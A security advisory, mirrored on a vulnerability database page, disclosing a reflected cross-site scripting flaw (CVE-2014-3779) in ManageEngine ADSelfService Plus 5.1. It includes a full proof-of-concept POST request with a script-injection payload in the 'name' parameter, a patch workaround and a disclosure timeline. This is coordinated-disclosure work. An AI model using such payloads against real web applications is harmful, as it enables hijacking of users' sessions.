Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormBlessen ThomasPACKETSTORM:129803
HistoryJan 03, 2015 - 12:00 a.m.

ADSelfservice Plus 5.1 Cross Site Scripting

2015-01-0300:00:00
Blessen Thomas
packetstormsecurity.com
26

EPSS

0.002

Percentile

58.4%

JSON
`  
Security Advisory :   
Exploit Title:   
Manageengine ADSelfservice Plus Reflected Cross Site Scripting (XSS)  
Google dork : N/A  
Exploit Author: Blessen Thomas  
Date : 03-01-2015  
Vendor Homepage :   
Software Link : N/A  
  
Version :  
  
ADSelfservice Plus version 5.1 Build :5102 , Evaluation version Β–Trial  
  
Tested on :  
  
Windows XP SP2 -Host machine ,Windows server 2003 as Active directory  
  
CVE-2014-3779  
  
Type of Application : Web application  
  
Release mode : Coordinated disclosure  
  
Vulnerability Description :   
It is observed that the Manageengine ADSelfservice Plus is vulnerable to reflected cross site scripting(non-persistent/temporary) cross site scripting attacks in the Β“nameΒ” parameter and  
the unfiltered input is reflected to the user   
  
  
Proof of concept :  
  
Request :  
  
POST /GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription HTTP/1.1  
Host: 192.168.163.134:8888  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription  
Cookie: JSESSIONIDADSSP=A4144A81CF9702C53035062DBA9CD0F3; JSESSIONIDSSO=D8EE830B96B0218E4548BA3B8ADD09DB; adsspcsrf=79cf454e-9b3f-462b-bb12-03b70cd2f469  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 161  
  
subID=0&name=test"";</script><script>alert(0)</script><"&desc=test&domains=test.com&domainName=test.com&hidden_grps=%7B%22group%22%3A%7B%22%7B1CE0BEAF-207E-4C48-B893-8A3B0FB49CFF%7D%22%3A%22Account+Operators%22%7D%7D&hidden_usrs=%7B%22user%22%3A%7B%22%7BC4520992-9D3F-439D-82F7-0869AF3BF267%7D%22Administrator%22%7D%7D&viewMembers=on  
  
  
Parameter affected:  
  
name  
  
Payload (Exploit Code):  
  
"";</script><script>alert(0)</script><"  
  
Vulnerable link:   
  
192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription   
  
  
  
Tools used :  
  
Mozilla firefox browser v28.0 , Burp proxy free edition v1.5  
  
  
## Workaround ##  
----------------  
Update to newer Version 5.2 Build 5202   
http://www.manageengine.com/products/self-service-password/download.html?btmMenu   
  
## TimeLine ##  
----------------------  
13th Apr 2014 : Bug Discovered  
15th Apr 2014 : vendor was notified by e-mail  
16th Apr 2014 : Vendor response received  
13th May 2014 : Vendor acknowledged and released a patch  
22nd May 2014 : Mitre Team provided CVE id  
03rd Jan 2015 : Public Disclosure  
  
  
  
`

Related

nvd 1
cvelist 1
prion 1
cve 1
nvd
nvd
CVE-2014-3779
2015-01-07 18:59:00
cvelist
cvelist
CVE-2014-3779
2015-01-07 18:00:00
prion
prion
Cross site scripting
2015-01-07 18:59:00
cve
cve
CVE-2014-3779
2015-01-07 18:59:00

EPSS

0.002

Percentile

58.4%

JSON
Related for PACKETSTORM:129803
nvd1cvelist1prion1cve1